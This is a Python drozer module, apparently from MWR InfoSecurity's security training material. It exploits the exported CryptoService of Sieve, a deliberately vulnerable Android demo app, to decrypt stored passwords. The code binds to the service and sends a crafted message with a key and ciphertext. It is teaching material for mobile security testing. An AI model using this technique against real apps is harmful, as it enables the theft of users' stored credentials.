import base64
from drozer import android
from drozer.modules import common, Module

class Decrypt(Module, common.ServiceBinding):
  name = "Decrypt Sieve passwords"
  description = "Decrypt a given password with the provided key"
  examples = ""
  author = "MWR InfoSecurity (@mwrlabs)"
  date = "2014-07-22"
  license = "BSD (3 clause)"
  path = ["exploit", "sieve", "crypto"]
  permissions = ["com.mwr.dz.permissions.GET_CONTEXT"]

  def add_arguments(self, parser):
    parser.add_argument("key", help="AES key")
    parser.add_argument("base64_ciphertext", help=
    "the base64 ciphertext string to be decrypted")
  
  def execute(self, arguments):
    # Create a bundle with the required user input
    bundle = self.new("android.os.Bundle")
    bundle.putString("com.mwr.example.sieve.KEY", arguments.key)
    bundle.putByteArray("com.mwr.example.sieve.PASSWORD",
    self.arg(base64.b64decode(arguments.base64_ciphertext),obj_type="data"))
    # Define service endpoint and parameters
    binding = self.getBinding("com.mwr.example.sieve","com.mwr.example.sieve.CryptoService")
    binding.setBundle(bundle)
    binding.setObjFormat("bundleAsObj")
    # Send message and receive reply
    msg = (13476, 1, 1)
    if binding.send_message(msg, 5000):
      self.stdout.write("%s\n" % binding.getData())
    else:
      self.stderr.write("An error occured\n")